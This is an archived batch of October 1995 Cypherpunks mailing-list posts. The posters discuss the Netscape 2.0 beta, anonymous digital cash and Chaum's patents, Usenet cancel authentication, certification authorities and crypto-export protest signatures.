plans" by Jon Auerbach is on the front page of the business secion of
today's Boston Globe.  It leads with a paragraph on Carl Ellison,
along with a picture captioned with his quote "We have privacy in the
real world."  Aside from a few minor inaccuracies and simplifications,
it seems like a very balanced, cypher-favorable article.

-nhy
---------------------------------------------------------------------------
Nina H. Yuan    yuan@wjh.harvard.edu   nyuan@fas.harvard.edu  nyuan@bbn.com
"Education is a progressive discovery of our own ignorance."  - Will Durant
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 8 Oct 95 11:15:02 PDT
To: Hal <cypherpunks@toad.com
Subject: Re: Certification Authorities in history.
Message-ID: <199510081814.LAA16455@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 AM 10/8/95 -0700, Hal wrote:
> One key to rule them all;
> One key to find them;
> One key to bring them all
> And in the darkness bind them.


A more famous statement on key certification authorities:

    And he causeth all, both small and great, rich and poor,
    free and bond, to receive a mark on their right hand, or
    in their foreheads:
    And that no man migh buy or sell, save he that had the 
    mark, or the name of the beast, or the number of his name.

Coming soon: True names neatly linked to your social insecurity
number

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 8 Oct 95 10:15:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0 beta
Message-ID: <199510081721.MAA06165@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Even nicer would be if the Windows beta included *all* the files needed. The
setup routine wants to install some OLE2 .dll's, but they don't seem to be
included with the compressed file, or even on the Netscape site. I was able
to work around it, since I already had the OLE2 stuff on my machine, and
edited the installation scripts and such - other folks aren't likely to be
as 'lucky'.

I suspect that Netscape is going to be hearing about that little oversight.....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 8 Oct 95 10:53:09 PDT
To: cypherpunks@toad.com
Subject: Kerserver keyrings
Message-ID: <X7yNcD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Jim Grubs (W8GRT)" <jgrubs@webcasters.com> writes:

> -- [ From: Jim Grubs (W8GRT) * EMC.Ver #2.5.02 ] --
>  Attachment: mailsig Code: 0006727      \ Created: 10-03-95, 07:16 PM [1 Kb]
> 
> Someone at Uni-Hamburg must have seen my message and said, "Oops, who turned
> that off?" Anyway, their keyring was upated today. It's 6.4 megs!!!! (My
> first HD was only 10.)
> 
> 
> 
> begin 644 mailsig
> M+2T-"B`@("`@("`@("`@("`@("`@("`@("`@(%=E8D-A<W1E<G,H=&TI#0I*
> M86UE<R!#+B!'<G5B<R`@("`@("`@("`@("`@("`@("`@("`@("`@("`@:F=R
> M=6)S0'=E8F-A<W1E<G,N8V]M#0HV.#$W($UA<&QE=V]O9"!!=F5N=64@("`@
> M("`@("`@("`@("`@("`@("`@("`@5&5L+CH@-#$Y+3@X,BTR-CDW#0I3>6QV
> M86YI82P@3V@@-#,U-C`@("`@("`@("`@("`@("`@("`@("`@("`@("`@($9A
> M>#H@-#$Y+3@X-2TR.#$T#0H@($EN=&5R;F5T(&-O;G-U;'1I;F<L($A434P@
> E<')O9W)A;6UI;F<L($EN9F]R;6%T:6]N(&)R;VME<FEN9PT*(```

Apologies to all for the mite in E-Mail Connection that caused it to think my
.sig was an attachment. Needless to say, I have purged my system of it...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHgO7t74r4kaz3mVAQGPOwP9HLmDUXzv6FHyWUwIiK+kGQkm2f/wS6+C
snRmcyuzUK1bYk/xKleq1bdwGo1p6WfkdonAKYlV2sQIfx5smMlwtVqyKCJ8PJZJ
EnNhT9i47x0/oF9qta0O225LRGKEFgMswaqAZoRbrwWk1wwDQy1Be1GdUnUMxCTt
Ss8yYdV5p4o=
=8fAh
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 8 Oct 95 12:18:02 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Caution! Netscape 2.0 and Linux
Message-ID: <199510081807.OAA00500@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


Hi all.

Just a warning to steer clear of Netscape 2.0 on Linux. It can't
resolve FQDNs, its distributed as a staticly linked a.out binary
*AGAIN*, and I'm hearing lots of reports sitting here on IRC that it
locks up R6 versions of XFree solid on a random basis. Not to mention
that there is no java support yet for Linux, and the Java support in
the Sun/Windows version of netscape is based on the new (and
imcompatible with earlier versions) beta version of Java which sun
pimped out to Netscape and won't release the source code too.

The part about not resolving FQDNs might be an undocumented
feature. The most secure transaction is one that doesn't take place at
all. ;)

Have fun,
Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Sun, 8 Oct 95 14:17:18 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Revised CJR
In-Reply-To: <Pine.ULT.3.91.951007163815.16906B-100000@krypton.mankato.msus.edu>
Message-ID: <199510082116.OAA03717@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Fri, 6 Oct 1995, Raph Levien wrote:
> 
> > SPECIAL CHARACTERISTICS
> > 
> > There are no military standards or specifications that this t-shirt is
> > designed to meet. There are no special characteristics of the t-shirt,
> > including no radiation-hardening, no ballistic protection, no hard
>             ^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^
> > points (the t-shirt is only available in soft 100% cotton), no TEMPEST
>   ^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > capability, no thermal and no infrared signature reduction capability
> > (in excess of that provided by a typical black cotton t-shirt), no
> > surveillance, and no intelligence gathering capability. The t-shirt
> > does not use image intensification tubes.
> 
> Oh I love it.  I warm kudo for whoever game up with the above wording (as 
> well as the rest of the paragraph). :-)

Thanks! Actually, I adapted the wording from Phil Karn's CJR for the
Applied Cryptography book.

I didn't find the time yesterday to send the CJR (instead, I was preparing
for a rather cpunks-friendly presentation on Net (In)security to a graduate
Business Administration class here at Berkeley for Tuesday. The revised
target ship date is Wednesday.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 8 Oct 95 14:20:40 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: anonymous cash without blinding
Message-ID: <Pine.SUN.3.91.951008135715.1544C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


With all this talk about Chuam patents, I would like to remind people 
that blind signatures are not absolutely essential to an anonymous 
digital cash system.  You can combine a traceable cash system with an 
anonymous communication system in a fairly obvious way to get a 
fully (both payer and payee) anonymous cash system.

Suppose a bank is running a digital cash system that works like this: it 
maintains a database of valid coins, and whenever someone presents it 
with a valid coin (string of bytes) it erases that coin from its 
database, and then either gives the person an equivelent amount of paper 
cash or a newly created coin(s) of the same value.

Now if the bank allows this exchange of old coins for new coins to be 
done over an anonymous network (e.g., a remailer-net), then the system is 
anonymous as long as you don't move physical money in or out of the system.
Maintaining anonymity when moving physical money in and out of the system is 
what blinding helps you to do, but this will be less useful in a fully 
digital economy where such movement will be infrequent.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 07:53:22 PDT
To: cman@communities.com
Subject: Re: cypherpunks digicash bank?
In-Reply-To: <v02120d02ac9d1e825159@[199.2.22.120]>
Message-ID: <17968.9510081452@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Doug Barnes <cman@communities.com> writes on cpunks:
> I strongly recommend that anyone considering licensing from Chaum
> first read my paper on some interesting aspects of his basic blinding
> patent. The paper is at: http://www.communities.com/paper/agnostic.html

Yeah, I read that when it was first posted, a very interesting
approach.  And possibly a way to get around both regulations and
Chaum's patents.  It is a more anarchistic, less offical approach, not
that I disagree with anarchistic approaches, or blowing off patents :-)

Just I got to thinking well what's $150k?  Not much perhaps if looked
at in the right way, a pittance compared to the kind of money the
likes of netscape are playing with.  And it buys some acceptability,
people do not need to obtain their anonymity after the fact, and
everyone uses the anonymous feature, rather than just cypherpunks
types.  I was thinking that the $150k might make all the difference to
the success of such a project, due to the privacy built-in as
standard.

> I will be putting up another short paper on anonymous currency
> management within the next few days.
> 
> Also, I strongly recommend that anyone serious about this not use the
> word "bank", 

you are right.

> and take the time to figure out how to structure the service as an
> NBFI (non-banking financial institution) and not a "bank".  Note
> that NBFIs are still regulated, and you will, at minimum, need to
> consult with your state banking regulators as well as the IRS (who
> also regulate money transmitters, i.e. issuers of traveller's
> checks, moneygrams, etc.) Note that the BSA (Bank _non_ Secrecy Act)
> does in fact apply to money transmitters, and you should be sure to
> educate yourself as to the implications of this.

Now this is the fatally weak point in my discussion, the political and
legal impliciations.  My only comment was to get legal opinion, and to
move the bank outside the US if this proved a problem.

I suspect the state banking regulators, and the IRS, would stomp on
the idea because they won't like the anonymity aspect, they would have
particular ease in doing this, particularly to a small group.

Even an identity agnostic bank (whoops must loose that 'bank' term
... 'agnostic payment system' perhaps:-) would have similar problems,
but at a later stage.  Aka you get your system nicely set up, have
some dastardly cypherpunks implement a way to hack your bank to get
anonymous payments (a complete suprise to yourself of course!).  Now
the regulators notice, and presumably make you change your bank code
to disable this possibility?

> I will be covering some aspects of these issues at length in my trip
> report on the anti-money-laundering conference I recently attended,
> which was a real eye-opener in a number of ways.

I will read with interest.

Three basic approaches I see:

1. go by the book, license the blinding stuff from Chaum, perhaps
agree to limits of $10k on individual transactions as in cash (that is
the limit in the US where you have to report cash transactions I
think?)

2. forget Chaum's patents with an agnostic server.  Problem is here
that it only provides anonymity for those happy to bend the rules, and
get 'blackmarket' cypherpunks technology which plugs and plays with
the bank.  Long term, this would be open to pressure from the banking
authorities, the IRS etc they would come and force you to do something
to close the loop hole.

3. Completely underground, anon remailers, decentralised cashing.

The problem as I see it is with options 2, and especially 3. you'd
have a job to get widespread acceptance, and adoption of blinded cash
as a payment system.


My previous post was based on 1.  The problems are still political and
legal, but less than with 3, and with anonymity for everyone as stated
aim, and hence not as readily removable by regularatory coercion of
the bank afterwards, leaving you with yet another non-anonymous
scheme.  My thought is that if you offered to restrict it to $10k
individual transactions (I know it sucks) then the similarity with
current physical cash is close, and there is little to complain about.
If it is payee anonymous only (you've got to start somewhere), there
is little opportunity for abuse of the type Freeh and co scream of,
paying hit men etc, as the hitman has to cash his money sometime, and
if it's unusually large, etc, it is the exact same situation as
ordinary cash.

They won't like it of course.  If it's too unpopular you could try say
Switzerland?  Some other banking haven?

What are your estimates of the paletability of the above to banking
regulator types?

The stuff about two versions of 100$ bills one for outside and one
inside the US a while back does not bode well for ecash payments with
*any* anonymity, but I think the above would be demonstrably hard to
use for nefarious purposes, and hard to go completely unaccountable.
(Modulo the proto coin tricks, and hijacked cash clients to force
others to do your cashing).

I reckon the recipient anonymity stuff, can be added after the fact by
people offering cashing services, cash is fluid, once you've got a
system set up.  Duncan Frissell had a nice sig to the effect of it
being hard to keep track of millions of private IP connected people,
all doing added services, such as providing anonymity.  At any event
the above system would be much preferable to the current offerings of
electronic cheques, electronic CC payments, and the lame ones which
claim privacy, but when examined turn out to be just private to the
extent that you trust a commercial bank to respect your privacy!
You've got to start somewhere, if this worked you could try for stage
2 later, fully anonymous, but at the moment there is *nothing*, and
there is surely a crying need for a decent ecash payment system.

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bogstad@news.cs.jhu.edu (Bill Bogstad)
Date: Sun, 8 Oct 95 09:00:25 PDT
To: cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <v02110105ac99c03922dd@[204.179.132.4]>
Message-ID: <458sie$r41@blaze.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02110105ac99c03922dd@[204.179.132.4]>,
Erik E. Fair <fair@clock.org> wrote:
>At 9:50 10/5/95, Rich Salz wrote:
>>Cancel/Supercede is a useful model -- architecting them out of Usenet
>>is a very bad idea.  Ask Clarinet.
>
>Is it? The principal effects of not having the mechanism is a slightly
>higher disk storage requirement for netnews - something completely unheard
>of in the annals of USENET.
>
>The downsides of having the mechanism (especially unauthenticated) we see
>now: official and unofficial squelching of articles that someone doesn't
>like for whatever arbitrary or situational reason.

	There is another benefit to the current system which is being
ignored.  That is, it allows for the removal of unauthorized postings.
Posting of copyrighted materials without authorization does occur and I
think the current cancel mechanism (with its lack of authentication) is an
important safety valve for dealing with irate copyright holders.  I can't
say that the disadvantages of the current spoofable cancel system don't
outweigh this benefit, but I think that any system designed to replace it
should include this capability.  Someone asked the question if one was a
librarian/archivist would/should they honor cancels.  Under the circumstances
I describe, I think they have to do so.

	Rather then eliminate cancels, I think a general authentication
system for all USENET posts makes more sense.  The news system itself
doesn't need to authenticate general posts.  That can be left up to the
decision of the individual reader.  In most case, I don't care as a news
reader if the real 'Erik Fair' posted this message.  It can stand on its own
merits.  In the case of cancels, as a news administrator I probably want to
restrict them to the original poster and a small set of authorized agents.
With new group and remove group messages, I probably want to only have a
small set of agents for the 'big seven' hierarchies and perhaps others.  I
see no downside to standardizing on a mechanism for including authentication
in news posts as long as we allow the user and site administrator to make
the decision about whether to pay attention to the authenticity of a
message.  Those who want the current system will set up the authentication
system to always say 'yes'.  Those who want to eliminate cancels can setup
the authentication module so it always says 'no'.  I would setup my system
somewhere in between these extremes.

				Bill Bogstad
				bogstad@cs.jhu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 8 Oct 95 13:22:12 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts
Message-ID: <199510082019.QAA15164@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510071424.AA00279@october.ducktown.org>,
mkj@october.ducktown.org wrote:

> Need I point out that pride in one's work is not necessarily exclusive
> of evil?  Rarely does anyone actually think of themselves as evil --
> and those few who do are usually just harmless nuts.  The most evil
> and destructive people throughout history have always thought of
> themselves as good people, doing good work.

Let me illustrate this with an example. During my visit to Dachau
Concentration Camp, I saw original lab notebooks of experiments designed
to increase the survial rate of pilots downed above the cold waters of the
North Sea. A noble cause.

The notebooks contained pages upon pages of tables listing survial times
vs. water temperature, the data gained by dropping subjects into a tub
containing water of a defined temperature.

I them saw more tables of the effects of various methods investigated to
revive hypothermia victims who were near death. One of the treatments
under investigation was dropping the patient into boiling water. Surely
this type of research falls under the category of evil.

But the scientists that conducted the study would not have thought so.
They believed that they did a favor to humanity. The fact that to this day
the treatment of hypothermia is based upon the results of this study,
saving the lives of thousands of patients over the decades past, would
surely - in the experimenters' minds - have vindicated their gruesome
deeds.

Ponder this,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHgyXyoZzwIn1bdtAQFZCAGAvCKsAfc09eefeVsp3Oec73L6WsvxJcbH
nlyp7+gX0rG1vBZcsTemp817MSa/WUbb
=UuOA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 8 Oct 95 14:34:18 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: [NOISE] Caution! Netscape 2.0 and Linux
In-Reply-To: <199510082054.QAA04516@clark.net>
Message-ID: <199510082024.QAA00698@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > Just a warning to steer clear of Netscape 2.0 on Linux. It can't
> > resolve FQDNs, its distributed as a staticly linked a.out binary
> > *AGAIN*, and I'm hearing lots of reports sitting here on IRC that it
> 
>    It was released as a dynamically linked binary first, however
> gazillions of Linux users who didn't purchase Motif (and hence could not
> run Netscape 2.0 since it uses Motif), complained, and Netscape
> put up a statically linked version immediately.

Releaseing an a.out binary without motif staticly linked is a dumb
idea. There were approximately a dozen vendors of Motif for Linux,
however none of their libraries were compatible as they could not
afree on where the library should reside in memory and how much space
to allocate for future additions to the libraries.

Thats why the linux developers switched to ELF format binaries. Under
ELF all symbol names are resolved at run-time so one man's motif will
work just fine for everyone elf. 

Normally I would suggest that someone should drop the good people at
netscape a hint that you can link Motif staticly without linking all
of the X11 libraries staticly as well, except they are still producing
a.out bins and since nobody has a.out libraries any more, making one
dynamicly linked wouldn't do anyone any good.

> > that there is no java support yet for Linux, and the Java support in
> > the Sun/Windows version of netscape is based on the new (and
> > imcompatible with earlier versions) beta version of Java which sun
> > pimped out to Netscape and won't release the source code too.
> 
>    No, the Java in Netscape 2.0 is Java BETA. The Java used in
> earlier versions was Java Alpha, and Sun explicitly said that
> the class hierarchy *would* change. The Java used in Netscape 2.0
> is the same Java you get in SunSoft's Java development environment.

I said it first, but you said it better. Netscape uses the Beta Java
stuff, which is totally incomptible with the Alpha Java stuff. Nobody
has the Beta java stuff except for Netscape because sun is refusing to
release it to anyone else for the moment -- that means you can't get
it at sun's site.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sun, 8 Oct 95 16:37:51 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0 beta
Message-ID: <307860AB.167E@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just got Netscape 2.0 beta for DEC Alpha. Here are my initial
impressions:

* Still no Java support (for DEC Alpha) :-(.

* I saw no hints of S/MIME support. Did I miss something? Do the
  binaries for other platforms support S/MIME? I have access to HP, 
  and will probably demand a Sun account from the powers that be
  here, just so I can run Java. I _really_ want to test S/MIME.

* The mail reader facility looks pretty good. The smooth
  integration of MIME and HTML objects is really quite nice. On
  the other hand, there are a few UI quirks that will no doubt
  get ironed out over the coming months.

* The .mailcap parser _still_ doesn't recognize %{variable} style
  entries. Thus, I wasn't able to test Michael Elkins' PGP/MIME
  format for compatibility with Netscape. The %{} syntax is in
  the spec (RFC 1524), guys.

* To send mail, Netscape apparently connects to the SMTP server
  running on localhost. I haven't confirmed this. Thus, I don't
  see any way to integrate Netscape and premail :-(. Guess I'll
  just have to wait for Netscape script (from what I've seen so
  far, it's not possible in pure Java).

* No user-defined headers from mail :-(. Thus, I couldn't put an
  "In-Reply-To: " header in this followup.

* News is also not bad, but I find I can't zip through tons of
  low S/N newsgroups the way I can with trn. I tend to rate
  newsreaders in number of messages deleted per second. I think
  with a bit more tweaking on the UI, it could really sing.

* One slick feature of news is its ability to decode binary
  postings, apparently in both MIME and uuencode formats. However,
  I wasn't able to figure out how to decode multiparts.

* The UI render code has a number of cosmetic defects (possibly
  related to the DECness of my machine). One new one is that
  drag-and-drops leave the Bookmarks window in an inconsistent
  state, leading one to want to press ctrl-L :-).

   Overall, nicely done. Mozilla will clearly remain the standard
in Web browsers, for the next few months anyway.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 8 Oct 95 13:48:14 PDT
To: cypherpunks@toad.com
Subject: Re: Noise: anyone experience with brain waves input devices (IBVA,...)
Message-ID: <199510082046.QAA15225@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510080007.AA01951@hplyot.obspm.fr>, dl@hplyot.obspm.fr
(Laurent Demailly) wrote:

> I'd like to know if anyone have first hand experience with brain wave
> and other (hyped) input devices like IBVA or others and/or pointers to
> informations ?

The pioneering work in this field was done by Andrew Junker, formerly Air
Force labs. He now uses his system to sail his boat. At Rand Mac Millan
Air Force Base, they have a simulator that is controlled by brain waves
alone. 
Note that all the brain wave interfaces only allow a simple left/right
type of control. Right turn is easy, but left turn is rather hard to
learn. Anything bejond that, as well as direct input of data into the
brain requires a direct link to neurons that can only be achieved by
surgical means. 

See Brindley G S et al and the work done by Normann R A at U of Utah for
the studies that defined the field. I have developed a design that solves
the notorious problem of connecting the silicon matrix to individual
neurons, but really can't elaborate on it until I get around to file a
patent for it. Also take a look at the breakthroughs reported in PHYSICS
NEWS UPDATE The American Institute of Physics Bulletin of Physics News
Number 236: August 7, 1995 by Phillip F. Schewe and Ben Stein available at
http://www.hep.net/documents/newsletters/pnu/1995/pnu-236.html

Have fun,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHg4gSoZzwIn1bdtAQFpWAF9HQg2f8myEyI4HrHY/5ZCnB/nLG+AzZXo
rA8zMPMo0l5t24i74tlTBJnaZYS4zkSW
=Hq/0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 8 Oct 95 13:55:44 PDT
To: cjs@netcom.com (Christopher J. Shaulis)
Subject: Re: [NOISE] Caution! Netscape 2.0 and Linux
In-Reply-To: <199510081807.OAA00500@hoopsnake.cjs.net>
Message-ID: <199510082054.QAA04516@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hi all.
> 
> Just a warning to steer clear of Netscape 2.0 on Linux. It can't
> resolve FQDNs, its distributed as a staticly linked a.out binary
> *AGAIN*, and I'm hearing lots of reports sitting here on IRC that it

   It was released as a dynamically linked binary first, however
gazillions of Linux users who didn't purchase Motif (and hence could not
run Netscape 2.0 since it uses Motif), complained, and Netscape
put up a statically linked version immediately.

> locks up R6 versions of XFree solid on a random basis. Not to mention
> that there is no java support yet for Linux, and the Java support in
> the Sun/Windows version of netscape is based on the new (and
> imcompatible with earlier versions) beta version of Java which sun
> pimped out to Netscape and won't release the source code too.

   No, the Java in Netscape 2.0 is Java BETA. The Java used in
earlier versions was Java Alpha, and Sun explicitly said that
the class hierarchy *would* change. The Java used in Netscape 2.0
is the same Java you get in SunSoft's Java development environment.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Sun, 8 Oct 95 17:16:13 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Caution! Netscape 2.0 and Linux
In-Reply-To: <199510082054.QAA04516@clark.net>
Message-ID: <3078691D.50683E45@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


(I have no idea what this has to do with Cypherpunks, but...)

Christopher J. Shaulis wrote:
> 
> Releaseing an a.out binary without motif staticly linked is a dumb
> idea.

It wasn't a dumb idea, it was a mistake :-)  We didn't intend to do it.

> Thats why the linux developers switched to ELF format binaries. Under
> ELF all symbol names are resolved at run-time so one man's motif will
> work just fine for everyone elf.

Even when ELF has taken over the Linux world, we will still be linking
Motif statically because we can't count on everyone having it, and even
if we could, we can't count on everyone having the same version.

And if Motif is static, then the other X libs have to be static, because
all versions of Motif won't interoperate with all versions of Xlib and
Xt.  (In particular, Motif 1.2.4 and X11R6 don't get along.)

> Normally I would suggest that someone should drop the good people at
> netscape a hint that you can link Motif staticly without linking all
> of the X11 libraries staticly as well, except they are still producing
> a.out bins and since nobody has a.out libraries any more, making one
> dynamicly linked wouldn't do anyone any good.

If you can prove that "nobody has a.out libraries any more," we will
stop distributing a.out binaries and start distributing ELF binaries.
But we don't have the resources to build and test two Linux binaries,
especially given that we don't sell the Linux version.  So, given that
we're only building one binary, my belief is that everyone will be
able to run an a.out binary, and a much smaller number of people
will be able to run an ELF binary.  If you have numbers, I'd be happy 
to be proven wrong.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 8 Oct 95 09:17:42 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Netscape 2.0 beta
In-Reply-To: <199510080851.EAA13995@clark.net>
Message-ID: <9510081616.AA03926@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



The shipped beta1 does not work on hpux8.07 (don't bother the looooong
download if you have that OS version) because of libc version.
(yes i know 8.07 is old when latest hp is 10 but 8.07 is also 
 stable and I didn't yet found the time to loose for major upgrade
 (and there is probably a lot of hpux8 sites around))

ps1: are the md5sums coming ?
ps2: it would be nice that ftp site implements an "SITE md5 <file>"
command, so you'd just get the sums from ftp.netscape.com and fetch
the files from mirror and check...
(the pgp signed md5sums posted on newsgroup, mailing list, ftp and web
is even better)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Clinton Saddam Hussein munitions SEAL Team 6 colonel cracking nuclear




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 17:32:45 PDT
To: danisch@ira.uka.de
Subject: Re: Graphic encryption
Message-ID: <9510090028.AA02204@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
> 
> >  Is there anything particular in graphic encryption? I usually
> >  encrypt graphics and document images as regular files with regular
> >  encryption...
> 
> I believe graphic encryption outputs a valid image file that is apparently  
> white noise until you perform the decryption transformation on it.  An  
> obvious way to do this with a non-lossy file format is to encrypt pixel vales  
> with a stream cipher.  Another way to make the image unviewable would be to  
> shuffle the pixels or rasters with a PRNG.
> 

I thought it was the ideas presented in Dr Dobbs last year of encoding other
information in a graphic image so that the image still looked the same, but
the other information could be extracted...i.e. using the image as a covert
channel.  Does anyone know what they're really talking about?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 17:34:48 PDT
To: sjb@universe.digex.net
Subject: Re: subjective names and MITM
Message-ID: <9510090031.AA02210@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Scott Brickner <sjb@universe.digex.net>
> 
> Patrick Horgan writes:
> >Given the difficulty of finding primes, how likely do you think it is that
> >given one of the well known methods and finding the first 1024 bit prime
> >that pops out would give you an effective attack?
> 
> I'm not an expert here, but I understand the "well-known methods" to
> essentially use some formula that "tends" to generate prime numbers from
> uniformly distributed numbers, feed it a "good" random number, and then
> check to see if it's really prime.  If it's not, pick another "good"
> random number and try again.  The entropy in the prime is the same
> as in the random number generator.
> 

Can someone give me pointers to literature on this?  Books prefered.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 8 Oct 95 17:52:22 PDT
